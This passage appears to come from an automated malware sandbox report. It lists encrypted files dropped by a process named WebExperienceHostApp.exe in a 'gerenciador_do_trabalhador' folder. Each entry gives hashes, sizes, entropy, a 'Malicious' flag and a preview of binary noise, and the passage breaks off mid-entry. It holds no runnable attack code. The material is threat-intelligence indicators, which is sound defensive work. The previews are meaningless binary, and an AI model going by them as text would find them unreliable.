                                                                  SSDEEP:1536:aV/Ff4ExhI6jiD4MeXZdOY2R4QZAZz9JRIHFt+PvmNd511wHg0w:qFf4qHjVdOESAZz9J6tovwLDP
                                                                  MD5:22C3A8BB3F94A4C21EE985A6FC23FA50
                                                                  SHA1:46DD8FEE82281B00178561C101A8F782F828ABE8
                                                                  SHA-256:AFAC25E01A51ABC1CB4D84D6366E773C2F20F51198AE7208ED2A668FF52045ED
                                                                  SHA-512:C1047ACFCDB567958D06F2807DBAD5192A6F6053F85F67D32CC73A6960D5C0DB4D49550403FB63EB9EE396A244B46F4BEA11D6C6AA699B179F023B3CB325F763
                                                                  Malicious:true
                                                                  Preview:.m.@.........!...&z.XIU.~.....|...m..%b.djc.....xC....Bz.{w..]n......;qB/.e.Mn^.4...z...h..c5.aB.{.Q3.$. l<h..G.y`.k..1C......Z=5.C0..l...k..!.%.+..k.LxK8...d.z....P.'..r.....).....l...6..p......P........i..;.\...r..Z..O.d.Z......3...P....c{..#....}w.Z.u.M...Q.!...{....B.....&.Z.+Z..J.p.R.&g2..!<........UxG....!.'.....p...X.,....)N.......Q.CMS....:......._:.....k....$.z.3..m.[Al...OD../........t;.......*...-..^..b.yM......X..Sy.w.;.6M.5.......fM&c.....$vPT.l.............EE.5..../.8....;e.....7...l..{/..e..wb.54z.B8\w.%.].V..q.N.o.|..,.xYlhT.'_.K.p).Hn..2C.....0...3..g.y..3....O.FL.G.F@a......;].*~.T..:.......jx.\.-.....?M.......Q.......<.....?..^0)..2.p..n..-.]......]..L.6.h3.K.S`'/X...sO.p..Q....T.f3. ;.._..V..T..0i..a..\.A.Y....E......{E.....*U.........k|.P..MF.;|.A.Y.(...U..'^T.........Hn.........U.[6..*`?]..?....@.|.O.>..d.b.....u...\...T.r...'..W..!..m....@1{.<.H..A........p......q...mn.pAY.F(;b#....B||.f...1.~.DX..............C.
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):94575
                                                                  Entropy (8bit):7.9977207538456065
                                                                  Encrypted:true
                                                                  SSDEEP:1536:yDJZaWA/FVGS7WTEYK1Nz0T2eTbvE6TXYhDXDNEcfsPcHPKTsbpdHc50YPlgM6JK:SJZapFAoJXET2eTbvxI5vsP5gplcHdsK
                                                                  MD5:CD0D394C2541D93A5FF9651E29B418EA
                                                                  SHA1:8A957D76714B485E751AE04DE7D741067986CF0D
                                                                  SHA-256:FAA6264780990444CE118C91A60FAED90326444333E29224A223384E4A114AB3
                                                                  SHA-512:DF1A28F8B18F7F49F119488325E6F39F7909B630CF6A9D20ED85EA5A7F385F7773A2E5C9D1C83800B68BDDE3C37CAA00FE6206B83FF7BF0B6E01E81D30D729D7
                                                                  Malicious:true
                                                                  Preview:..}.m_.c...'..sJ...BE?..q.x......\..~....%.Y..%..pDN..."....,........g.V...".C....&..s:.s.......m....u...8.<w...q.U....m.V.#./.......:^.......N..a.[.z.i..>.i.#.A.74.D4........-.u.;....9<U...... ...fF^......=M.B..xS...F...f..+..{.. I.sx....h.\s`....i.W...]v....VL7.......b............H....fsCn.#=..q...C....mvX....6..R..{..S0=....P...g.......&....{.KOld...;60N\8r.b........)I.e9"k.,~w .....r-x...k../...f.,.....x.......8w.K..2sf...j.{......Gue...%9.......w.tR..,jjb.agk..0....IX%/...9y..4.e.v|i..m..+^j.....~.[=.C....f..}...........9.G.......k.|".Z.it.`......I.Q.4..D.e.G^.0G....H.....F....<...p....0.../...kO.M.e.j.".P<:..g./....3.<....1..I..$. ..?.ZXP.^...9_.@.+......+...(.xY...:...R.2..d..&...5.L.....r..T.\.....C..."X*..N.73.g.i(...54.F..,H(Y.7..gw.Qk......M..z.z(.3G...'....Z*......^.lq.6.D..s...$...=...N.V50.....94 .....l.....c.....i..P....7.W...8.u....%V...s.:`...A./...."j....p.W.M....'....Z....-.....x..._..$..".z.@f..Gav..MTL.v....L.....
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):30090
                                                                  Entropy (8bit):7.992994224587034
                                                                  Encrypted:true
                                                                  SSDEEP:768:atLQILl8MIZcfii/4czvoyposUaz5u+1x:atLh2K9/4czRpxUazg+H
                                                                  MD5:DF4ACFEDC75F132012DAA6F6BB41947F
                                                                  SHA1:9F9FCCB55311FD4BB0FFAD4E77038222975D2C61
                                                                  SHA-256:724CD78929DAD83B3E2CA0FC1795E7B347D1A7547854F1691E18F61A333EB596
                                                                  SHA-512:4AA1103F3E209D5BF4C579CD64CDB690EBDBFD83A722AED84698286389686DF580F2FB2C3DEA85477B78230F34941D2C8EB8B17B91853EA455D4003FDCC1FC86
                                                                  Malicious:true
                                                                  Preview:r.K....t8.....*=.`........,.....#.-....(.v8+o..4......Tm..[.'=K.=.Y.....[?i...:W.E9Q...B.*...($. ..t.."...'....wb...B.E...:a.|......=...3q.OA.t......t^..=...u./y.\.p\N.!..V..XY.#.M`..O.(........6..)p.6>'..^S.....I...\.2.*...\.L1l.....7..y>.V#.]b$O.....P.d.2...)..A.r..\..Tz......0........C>\.5....+.5./.e........+.#.n...9.)....$O..I..5..K..~......Z)...mL...}.rx..8.....=...]<.......sfkKc.5.1rc9.B..B..~g...a>..:s.B|.zU.9..[NJ2^.|...%..;.u@..5.A..n.+n..q...s.(<.1q...F.K....w.Z:..u..jD.......K...)...1G....c%s*z.......$/.2.L..n..B>..&..^.....Xp.q..].N.tM.fm..n...[K=.S.../".=b.&..w~@...,v..-H..6..+......-.h........:|.?&......c....l(H.lP......z...x..Q|R.u_.&......O....MrX...?.@..%.]|5..H....Y.....m.#@T.2|.0.o.7.9.,X.e.%.h..!5.H.*..<.vw.<)..;...B..X....a.%..9_$(b"....3Y..m. .....Y...v.e....Cm.O..P.....@.D.0m.+.T4...5...l....p..U.X@...U...g........*.A3s...YM_.eu}km....{...B....u.GcN..:fB/..".>.$..J...o..e.}.koM..p.b....Fb.....82.4.".O..B^.G
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):100848
                                                                  Entropy (8bit):7.998369976636654
                                                                  Encrypted:true
                                                                  SSDEEP:1536:m7KhBLzfCjzS2FpX6XhaUM+fvZRVczMtoYiaQ6FDExNPdjmgCvrpcIfVUBP:mm3+3zpX4snSV2MyYiF6NKOdjpccVqP
                                                                  MD5:AFAEAB53E11D67FB43EEA65E3CB82FCA
                                                                  SHA1:102FD30B94F1072E3F0C7D73E76F258E1F2A0001
                                                                  SHA-256:227CD283ECFEAD810EC11E444E571C8058568671E2A3D260C963F31B09D5D7A1
                                                                  SHA-512:D88AE8F2B69F210D7D6FB230A2692463D23424962F8BB20E49124F5D5E3A9D7E7005AD04B712F4EFDBAE1AA806A7DDB9BDDF595D923637C8B3938209D9C4580F
                                                                  Malicious:true
                                                                  Preview:..).........\...FR.K*M...E.....A.X..j"..Q.... .....ncx.....b".f..nek..G...Q.....C.j\..p.p.{..+..D....$.....<.Mj.;.}.u..-..D.".....K.u.Rj...h|/zA..[B...[*".hf.m....T.N........;.V[V._%..t..<#.rE'..h}..&E_jb[...'.'.........5o..W+.+...;N./.d8..yC..+.r.......5.N.J+.x6x..L....o.A...1x.....p.V.9..N..5.....x3.%.g.}.....D.z....R....6...l.....h..2.o6'...S.....7.....O.....g........BNK...p.....J.<1|...U..F.C..nBJn.s..:`..+~f.......9h...{...(..>.yMv......./o.Rk.....|:D....:m..3.6.gD.^.b?.9.B.A.J....]:.f...z;..J.W3..Yw^. ...":.H?u.:.<.J<.T....?.|]...h..a.|^.z{7J&.h...K..4..n%.s.{..#.RE..'.Cp..r 6.^..Y."../.....fca.Yb.%....f.`.a2...P..d...X..W...A.1nG.a..c...^f.+:.@.HY`*.ass}...)1.....tFX....>...8.^.RdI...*"#.]D...lW..C.7.-.?._..%@...)<9...(N?J.u.r/:\..]h....$:QL^L].Dz...q....z...1....|0h.UiL..~j{..."i.2..r......V..aK.wj.b...(~?.r.Vm.%]_..]V......$O./.-!.... ....ty....<M.N.zF...eh.....pu)s?..Syc...4>../D.....N.....1.{0..\..{.&d$...Q.g..(.eR.....X._7........|m
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):108428
                                                                  Entropy (8bit):7.998127695945678
                                                                  Encrypted:true
                                                                  SSDEEP:3072:NnvyPCeFLI9z/1n9n+YlOazl82sL2ZNTYsfd:gCemnn9+YoUl8baZNTYsfd
                                                                  MD5:38F750CA8823977655F9BD61F0D1E405
                                                                  SHA1:2191FA88948D734A364A295F1A085ADE66CA9B58
                                                                  SHA-256:9F0C95336E7C78312FC24E0A89F1E21F73317D2237875806F4EC354525444804
                                                                  SHA-512:ED024D1277CA23079C92530A130FF99A49D41043AEE1F60CAAD2EA9F3F73EF55A240CFC90A0F3EC0CB1941D669C543DC9D84ADC2238F73A146CE84312227A078
                                                                  Malicious:true
                                                                  Preview:.o:l..T^.w..&...O..,0o.............)k..S.XY....w...7~...3.....b.i...."0/..TR#"t.r.<.wZ..T...;......U..x.w.k!..2..1....)....G.d......>.....k..RNk..p....>.*I.9a.2n...6.'..4....t.{/f.-..;G...yJ..\Z:.A.]..~\.E.i.Q.5tc..!.....+.M>%.P`.f.:m.UGHFA..z.....6..UJ3..a...'O#..;%...e..A~L..J0K.J...l`lr.t/m....@A.9..G.3R.m6z+.E....~.... .a..y....s..G......K......A...G)..o...UYE.r...5!Y..y1..S..a..Ao@u.(.............5XN.3P...w..r..>...a.[.V.Jd.D6...]x.'.j5-%..Z..\%.......jn.N....4...W.d,...Nx..u..]t+.>.gnB.n$b....M.0?`...!.1.z..i..w.)........: ...>.......G.U...*.w...z.E......4I'z.....|..6.....J.;..1..`,..?.......YX..I./._.:l.............!......7Qf.d.`.4~.......I...2wE.A5.]......<~r...5.?...y.w.I.0...q..<?"+..4.~...<-7..0..d.(.aZ.....^f.!O.2...Bk..E..,.3.C"h....Ck.-.(".....C.&...N.3......J..:@F....Y..l.=........%.n:.|...w....t.....d.m.A..........J!.].=.uO~............qIf...%bA..J.z....M.]......D.u 3oU$.....h....3......jv...-.U.=..G7.rr.......
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:SysEx File -
                                                                  Category:dropped
                                                                  Size (bytes):33069
                                                                  Entropy (8bit):7.993925773002762
                                                                  Encrypted:true
                                                                  SSDEEP:768:pyxDdv06jbLxo+fkAAVxxHheaSFs1781Ns0qU3PMra+iw4:pyxnjPxLfkN6O78XsJaP5w4
                                                                  MD5:58E78B76FA5A84F006B2F933F6A83FE5
                                                                  SHA1:C3752AD73B82D2F9E5345060C3FD158B8BD1719C
                                                                  SHA-256:151B5549D182DA650EB17240295977BDD4EA1FCEC932A0790562D981617F0D00
                                                                  SHA-512:9F73BABA449ACFAE73F86C0F3F28B08D31CB285439CACC1F29164672C5E4DA0867356F2908C3FE38D67F61C2A25D4A6C906ED78D173D189700C7FA17507E10D7
                                                                  Malicious:true
                                                                  Preview:.U..s...'.c......j6.g..;#...}.X. ...(.....*..K..Pj.Ox....|.....KX.).e...d&..$..v.I8.oi.1..MD...p....:..4H{....../.q.....-l.u.3..\......6...d....0..IA..L.........-..V.V...x..."....TI..n,.0J1;.y.T`..#.gX..S.E!.9.......~.<-.8a$.;T'.I........:9#X...H..K7&.8.4....w..h..h.[].k............C.L......@"...;w}...O'.w..]YF.1......@\$.YK.QA.G..`...5xO......]...rK{^.D.;.........m..}..2...a_...9`-`.s=.X`.wS..EW....l......<...^....H.......'<.%.....\yhB.'...S...&..X....c.#w.....5N[..;).P..M...{...4.U.9..:..2.4...g............}..'..~Y.vc.Z...~.k4....;.r..h..!.6....x.....a..q........l.....+>.-..~D/.!>.L...?.+.l...|%...D..#..k...0....gj..:.!.+..z..?H.....|...6l?..n.M.yI.{NK..:ZW.L^8.=.h...g.....J.F....?yB.oM....H.un.U5....r.P.#i...,......].J`....b..<........m.............._..K.s;..U.l....~.5?.......#..;..x....D!4@...x..hg.iF4]wg.4;.vt.;|..P'g....9~.:........b.Wk..hl.Z...}G..d-..:....Tz.dL0aA..C..!.....E...W<....n..*.=.h...;m.~..7"..a.0.uzu....._...
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):54007
                                                                  Entropy (8bit):7.996688250578679
                                                                  Encrypted:true
                                                                  SSDEEP:1536:4tly2UfwKToAZoNUB86cxCFPfNRYBDOIF0VHvg1PLdLaic:WUfwKTfoNc86cgpYBDQVcPLd6
                                                                  MD5:89E443702267165FBAE87AF26C939C18
                                                                  SHA1:5029D14361733424BE9F6A6E1B6F2BB57653ACF9
                                                                  SHA-256:23F0FD815D5A569779089212EDF6060C4326D15F589A5BC25136BA192BAC3A84
                                                                  SHA-512:E5F9A8C8E00847AB66A72F1530CBF8964EE1F94FD6A8114B8D9F0504404162CAFBB67BDE3F393F9B8B4C4CFA5A690E8C52E4BF9245F3F70FAB99B9D6789E60A1
                                                                  Malicious:true
                                                                  Preview:1+...+y.=b.;....-Y..F..Kz(.D".DBt...s.$.v.j....#{.....4)\1>N^..e...UgNF.p.....TX.>.=....-...1z...+..1..rv.].K..~.R=k...?_m...^O.......%.:....,5j..|..U6.....$..V.u..y...hG.x..y-.[oX.\.....<..z.YUkUUI&.k...)(J..e....G..E.#.(k.5...se.*....J..4P~."..@..f.....>........{......./D./.).......>.,....=.J..Yh3..r..%.nY"..X.V.....|h!...w..=.{e....#....ltj..tK..St.%.L.P.3.8a......*S?_5...6....&.y9..Ac..9.....C..v...^....!.*o2B..c..5>H.8.D.a.u......Y._+.\....V....@0L3...f.H..!.i.nso*..\...u.......g."_L&RT.._SLB_..c..Y2...=O4...b..80.Ud...Ds..S.q1EuB_.{..y.,....@.iq!..3\.V..Zw....../.}6Q...}n.......$*........e...u...j.U*....;Ao.d.o..Aeo-.q...e......s.s....7\K=........N.ggf/.0.7.D{y...b,..y.,.hB.>..&.l.....vC{h.iP.M3w..D>....S.j..o.^<b...Yb^..x~.ox.pWb..Y./c..,J..~..B..j....n..B;y..>..w..:J.HM.....a...X%.~7.d..xi.(....:.Hp....^c.n..Y%Vd.....?....Ef..Z....{..r....,/T...3O...k...dy.C9[[..)3.Z ..8...C...:...@.]hJ?@.".<..2.?*!.[../..Z6...'F..QE'....
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):101889
                                                                  Entropy (8bit):7.998101540203829
                                                                  Encrypted:true
                                                                  SSDEEP:3072:F+k1vLojmdohZdLA4ynukBMk9yu+gl2SaV:F/9Whcak9yu+2xaV
                                                                  MD5:F798328E8E146EE0F21494DFED694087
                                                                  SHA1:9259DC61933E9DE1C0D8586E632FD7C504DE5AF9
                                                                  SHA-256:7BD6D8C54EE016BD3B543F1B960AD63544E0223FFE1472BD7533E05C3EF8F4C9
                                                                  SHA-512:F85F4EEA09A19AF2E25257119B8D91373F55D891D4BEA002C48EDAA5660895DA631F84EF45B5CD5430196B1606DF6782F34433A8D9F3D2244D78EBF682AE307F
                                                                  Malicious:true
                                                                  Preview:...,v....,....h$.e.J".....f......l.<.Z..9E.~F..Dk.4.O=..M.....[K(.m..yS.\....L.j>~.@...B..........o..8..f..*....r|pc.......!..OP.b..n...y.-t..8..90.......W..^.s..H.fL.V+4?Z^..........].4u{2W.zG.M.(.*.. y.....Hyw9n>.2JN.t...D}U.b.^..z.....r(...j2...('.,b.{.V{*....t.4]r..(........>.\.H.......A.G. ..}-...o-..\..*.Qso..d..Np...Z"..Uq..j.g.L...J..h..'..C(.E..^.c$...E..>..K'$U....j`k.6Pn4...S./[.........^hVZ....2..P{..03.Vij.(..f[....%&....6.....%..i&. .....}.f.|....,.-._.....(|.....u..+)...........+g..l.....i......[.^....nbe.Y.>...'.....l4.7.E."U.S9 L...L.HU8.w.s..yf......n...2S.IE...R.i,...a..O..c.^_)@N.....C|d{.[..$>.."...!.Z%....#.,+)q.0.U....@6...y.a..Vywl.../.S...j............|b..&#.V..8............2Zf..tE.Fx...J..C..Z.+.....H........cVT..8f.....G j.[..L.#H..+T...85...)....l%R,.}.X.*./7.([..2?BQ...5@.n.D;..Y........s...)1..W..A...#...UV...<.[-..S.Q^xJ.g.3u._F6...........;8....u'...@.6...F[.....#.......P.Y.e..A....i..].....E..<./
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):36160
                                                                  Entropy (8bit):7.99479992522762
                                                                  Encrypted:true
                                                                  SSDEEP:768:zgNu58OFEQqW0znq7mgQgQNNtATfIidF96DFes+oreMBR7:zgN3OaQgznhCff6kqrhR7
                                                                  MD5:217C230519DF70F807C75FB7A05083E2
                                                                  SHA1:5628299890E30BAC625A08A47F3F8AD6011CA394
                                                                  SHA-256:E2C1D1DB42BCB737B7E9F628CA095783949002A77A0ABB4318E0C020CC0C6B20
                                                                  SHA-512:D09A8606BFCF473D7305947D3142F145F29AAB2A3798915017510A708EDBF314394D415A0E8B54ECCE799B5C335254CAD16AE3280286C7342764B215BCF484CA
                                                                  Malicious:true
                                                                  Preview:.....M.&....{.up....P.L.n....6B.[.....]....V..P|.W.F..,.3....#......1.!6!.].P@....R.m.F0,.;%.i][.qI..B.....].}r...:....J..u.2.]9H.=T.$H:.........L.....x......h1.t'M..Q[......b^.{.0M....4.&.v*...c\tR.F......d...y/../..;.PE.r..:.X}..tc....0N..V..RqZ...w}.z.i...c..d9.0K.L........+....3p..4......l...K.gC.p..z.S.o......R.M..~/S.<$a(/F.l.T..T.?`.B<.........X.u......S.S........[.a@...n.....,....(e....$....+H........g...f..._....1.....f.....]..w...!}w..#.....m0fk..'R........r.-.m...h}..>.b.vx.NX0...gK..!...\.*.....L...jn;..&L.....j..<e.S.MG{M...........j.}.Y.=..Ne....bV.V..*..kx..VE..#<9...:<v.r./..RY...r|i.....<........G..-.....`&H1..{....T;...S...5.e.....V.....t.?vSyG..P\.....?.q.....<o....fJ.d..47...5e-+~>.!d.+k..-..~..[.V....{..ZU....\...a.b...+.e..7...j......b.!.M3........A.b...O.Q4......#.].>..4.1.U.....0.P.m..*.).lCl&;rv..#..*..Z.;4xm..s..^{..w.c.o..w.A.).Zm@....@..>..B...X..J.".>p..M.'D.e.m.F.......J.Q..3.....[.+x.e...'.gd....Jx..B..+
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):106396
                                                                  Entropy (8bit):7.998067864727535
                                                                  Encrypted:true
                                                                  SSDEEP:3072:qM37hIVrxhOGOQQnmQ1ITmxzq0LayAixElw:J37YhOGOQAH1rxzl+yAixp
                                                                  MD5:6185A27AF47F65502F8D4C2B4BC1FA86
                                                                  SHA1:391B549D775674B084948D22C2F04D8A1A4710D3
                                                                  SHA-256:DBC6E143113C467818082DFA9E951F1371EE76371D27B601C34137138BF4D20B
                                                                  SHA-512:7612334D4F70D5E4225F1D083989A20B20B4C0DBE3FC99546E904D51A2743EA3DB6E1D748E5649D432163006F5008E01EAE2541ABF0C22F68C5834721C8B7E88
                                                                  Malicious:true
                                                                  Preview:.*..az...1E9.$:S....._+. ..z....VR.2U\.X.t.B..J..x.=.4....%...............O..T97.8@...9NM...........Bj,.)f!.u.g.<...o...&..SXU...'.d..f.Guy.6...?te+........).....D$....JWL...,..r...r...k."X....`H`.rq.i...<......iB.w.i...$...Z6.P.~$..dP..J.....b..qC.........._~Ug..KV...)H.|.z_.(..y..a...'.....m...........r......{.l.n4.....Q.-t....c6.K...u...~...D..0......dC....h^@o...c.'s../.."...6..d..4...aN.\.p.:eK....#O...r4$Z.nuOG...C...2uKLl...!.......8.'...d....k.QT-.QD..._......k..4A.../'..)....L..N...$.w..f.N*m..GJ.N..q.|N..w..W.F.j........(&.`^.m.F.5.*..m\..0...`..#gP....s.3...4.B..W..3.*...Z.\...h.Sr6.d>.>J..H..'.d.T..Pm.s....(.V..B.Z.._.6.yg".C.D'^..9~R...&g[.qN.............2B.._...J...<..vY=.4..]\...=K...&...rB./1C..A.t.o......G..mK.E.1.... !N.....!..W.I.u@......=...e!.!.+.@......q.V..9?.@...H...^.kc.'.<.F.7......Q...).[\.=.+*(.1.....]P...$...d.[Zru...J.tu.:+v.s.@.4..[.......Z..9..O.......qZS.f.;.,....5G.-.p....T.....C#..$#.0:....
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):39593
                                                                  Entropy (8bit):7.995031825226503
                                                                  Encrypted:true
                                                                  SSDEEP:768:S/R/jO3pGVwBF20lNBVfwXIpNzBToHSfbu4SAvUN/pzSUx67//yFF:MRrO3KqBeKWSn7WF
                                                                  MD5:4B066D38DBCF6B34DAC79FDF1D8B61A2
                                                                  SHA1:83F441ABC5E495FD1086008DE529640F2C21F346
                                                                  SHA-256:3A76ECE7B42A78424B5E9866BB2820AF870622B8F9B5CD84711029126673BC08
                                                                  SHA-512:9099B67AE5A0CFE2235C440DFF4A72FC5D527374A8E558B00F2EA935401838073A4F9F7D6C7C6A5DE8C899993F35C3C8881E2C263A20332D036A3493B307730E
                                                                  Malicious:true
                                                                  Preview:M.......EO......R.....7.3Z.....j...,qZ.X....).'..>s......j...U....=@.@......i.."....?t...l...0K.Ma.<..}s....P{/..|..._..T...;.._.{.@V..`~.v..l.....G....r.o.....s.;.&.D@.%Q%."../...<..n.$...o;{OO..C}..5..H...bw....6.7Q@.....Y......]t#.h8v..0.....M.}ei.3n...vK.....m.mT...\.v....k.......sp...mz....O..>.mfb.%.......<......d.Z...X.E...C....b..L.l..1..5.^..!q..6q......6.....}$..Q".....m...~.U...!k..%........6.v,..t.......Z..I9@B.q...u.j.b;....WP....Vo...IX.|.........0.A.N.TIlm..@J7.?.N..6.+..x.n..l6...C;k~F.......V7.Lk....].....^__.va...aHd.j5/.8O?....X9..#.-q.v*..E...z..........^..]D.}x....M.f......W..5X[..9.<,...QB.W.....Y..v.qM.(.L..p......y...O.....,s3q..-.[..%...'.EX.....<.`o..*,...0.kK.:...._....'T..m........{.0Z..1..).P..MQ..O..(....p&2-k..`*...z...L......5.|.e...53E.....o.._6H_+...j.{..;.......U/3C..A.=.5 ...x..AO7fv.Y.|......r..4N.E..\.d.....I.W..Bn../)^t..$.bBC..z!_v ...8....*k.[+Q.e..]L.t3.......,.L..d..Jy4.....p..7......B
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):90014
                                                                  Entropy (8bit):7.998209516743823
                                                                  Encrypted:true
                                                                  SSDEEP:1536:qf6fRCL8yUFSwdbx/xsgwonwHSAnZEbn7T73l/hXASqURe4iJbA+7zx:zfMLfiSwv5wonOSASn7TTl5wKe4Izx
                                                                  MD5:35C1E7A53DD23C00ACCE2DA7FBB754D3
                                                                  SHA1:159A471D00F72014352CF1F40FECEBDEB1FAA5EB
                                                                  SHA-256:73F0DA73F1712849AA9878FE0C6442121350BA928632D7C20D99548740D58A55
                                                                  SHA-512:417C1F00399363F653B3B011317FDDB7BAD5238899EFB404699344B4AF484AA0F97F6BE2117CFE3ECC2BE2ADDD9DBF16837CA6D541D57653AE0AB10AF1991075
                                                                  Malicious:true
                                                                  Preview:....r=.B...u8..Q.b......Tv...l..e.J....%..T[....."...u.."..&|yJ...,...a.N.Q.-..)...d.....,Q..z....u....p%..6.Ho...#O...g.c./..v..\ A.../....g...;_.......wE..*b7h..x...P.>.~...Y.D...t.U.p.....h...W.......K.>mT...=_...q..| .-...6s5....5........~jg...{..1-.wF4.B&7FO......*.6%.....+..Y..;.....r.9....../..}..n...B>_...R?~.'{`.B.aT...2p|..b.....ME........F.F..S...".-..V;...+.mr#..E....r..m....3.J....(O..+........3*.yMG..\...........|.gh..;.J....F.T...+Oz..w.......y...+.5...!....4ww.".l...:e;P..S...qY.~.A...c.[*rNz..d..w.[.8.......U.>?=...1.=d.p..>2#.u.:..\.1...X..7.EUce.U_6z........./W%..}..K. ....O#..[....x.;"...........i....Kg..=t.k..K...j.L.....U(......$.rO.t..".7..5r..o.7.U\..&..,m.|lH`...d/.0...V...Y.L...}.J..'...l1n...T.@h..?.i.uo[0G<...................B.pe..3..>]wZ..$.:.n!......K.........\..]..v..l.5......A.ydT5..`..M..Cpx..{.{..fr.........f.v....:...@pB.+...>L...I;:,)....?j....f.=l*..A....Si.U..UT..hD.$T.u..lR..f......Q$0".Z.
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):32520
                                                                  Entropy (8bit):7.993661924408125
                                                                  Encrypted:true
                                                                  SSDEEP:768:FWmEF2vB3mkeGVFdd/s2WKI30gWG1hAbbbo4B2rTi2dwEVhVJ:22vB3mkeGVfFdTi0gSHog2S2eEbVJ
                                                                  MD5:DE65F5463326EEE43A9AB108DED94C53
                                                                  SHA1:F7BBE75610DC317D897040AC5DB4041B3C16BF36
                                                                  SHA-256:35BC57819FAD6E61CD0819EE5EEDB827251D83FEB23E809D2CD746A36C5ECEF7
                                                                  SHA-512:EDA61A322A4AEAB9138DE8FEF4BCA8E5ED5EAADF5C50573E05E15BE94EBA72179D225D4DC7606F6A8055C9942F05A8E1013B3F009C813DCAD33F5DC405895DFE
                                                                  Malicious:true
                                                                  Preview:C.,n..7.L+.'.....c./.. 8....\U....cc.a.v....3Z.!...w.DE.Jv.@.Z^l....`.J7?...E|b).....(pG.......p......oD.~..l...h....^./.Ee'>.U-.$^0.Q......8.........s.8QJ..R;.g...............'..9.VG.....p...e.U.`.....(....m.\.x...o...N.X.T..zh*.;....F..0..7f.N0..".....=Ua.pK5.g>c.gN..w.y....`...Ok.R.....L.'M._...I^.4.%{....gL......8..;A.../.E"..._.....:.0.1..L1.C.....-.....4........%...?....W=t.{|!..~.a.G.....J._v.)..e....{/n....?m.%2......w.x=.4..D....Q..F..{F..r..W&Zm.8..bQ.....+.~.....lZ..WO.h.?.o..#.F.F.$..4...2.kz ....|].v[0......iMX_\..T!..9........|]..R.<c.B.Bn....N..N2...v?=(....&..p.S.<.........|e.-t.I5w;~.h+x..p..=-y.si.9.?.....J.->l...].2..g...ia..M...`.Ac.....w..."........6...s.gF5..y..ks. .p.g.-..z,?....I.`.@..z..ht.....Q..."qRJ......f...G.O..x..y<.....S.........C..!...;.....g..Fz2.75../i.2..4[.\.q....'8Z.:|5..]..Z.p.......zB.Gm.M.I`...7...7........C..;.*..S.(.......M9.....SJ^...K..C.k.M....V.uk..e..'...$.ZNi..yU4.4...^......h
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):100966
                                                                  Entropy (8bit):7.998412085921912
                                                                  Encrypted:true
                                                                  SSDEEP:3072:lG5ZPA2Ei0Glgejn7T8TCuIO5p6H6+cRJXEo+RMdxBJ:UZPd10GfneCXO5YcX00d
                                                                  MD5:F55E7B7AF6071C10547C54D62204B475
                                                                  SHA1:E036BEF92DFF196F6423F7B0C094F634DCC0DEF7
                                                                  SHA-256:B862442376861EDA141DF226A952D35FB5E82AB127AD090C81EC46FF8CE33A0C
                                                                  SHA-512:544492FBC7B42B400C664B27033F3EF212C261290B857408258BDBB3C3DF6D0C01D8585D4D2BE6133E15B90096230EF289164BF025B1FE0B5A66452FAA28F4EF
                                                                  Malicious:true
                                                                  Preview:.8K..^...D).cN.P....k..T@..m..Y.@.@[.....n..J...o...x...39.LZ.R]N..$..s..........A.Rt..Qd..b.W..l>..<f.E.6.!2#.p.S.(b.B.s......B.SE...M...7.w.........{N.....L!...].sV/...-8.....Q.:d).u.....A.4...F'E.B../.}.&.i....*".....i.q...D.<.....3#...2.><{{..{..n.a......xrq-.......#.......U.R..U ...........S?&.H...s....v.....np.~J6....W-..Sj....T$~..Q.`?5|N.5.2.?.....BU..@ub..*.....:.CZ.j...]..jH.....3..U...1&.s9.......*s_.d.c.4.X..3......Qk..SC.U...&.9F.t...h.9P..*....5..^.X.\....<...n....h4.....'./....1M..."?..(...C_..c....wGu.......`l.zd..FA...s.X......d{.|.1..M6.....[.X%....v..f...o.......L......|.....M...O.4^{R.{..!y. r7.._@.3.. m.*..].o.....Q....z.Q."(.<e..RyG.l.u.7.:.%Nz....2..`q............T..p....I@.D&.1=niUdal.Zq.....p4.`.Gi.D^a4.....H+!..X!.m.'....`.......I...~.:Y...f].0.y...s.r...G.......IOh...u.D.D6R..9.Sq.R.t7.....p..+.'..q.X....hn.D.Xb/.'..c.e.+..$.)=...V.RvK.t.Q/QM.pE.-..]..\p5.....UL\..a.5...s8R....+..8N..oYRO.A..f.r..TY..d..<.b,......
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):37116
                                                                  Entropy (8bit):7.994747677689325
                                                                  Encrypted:true
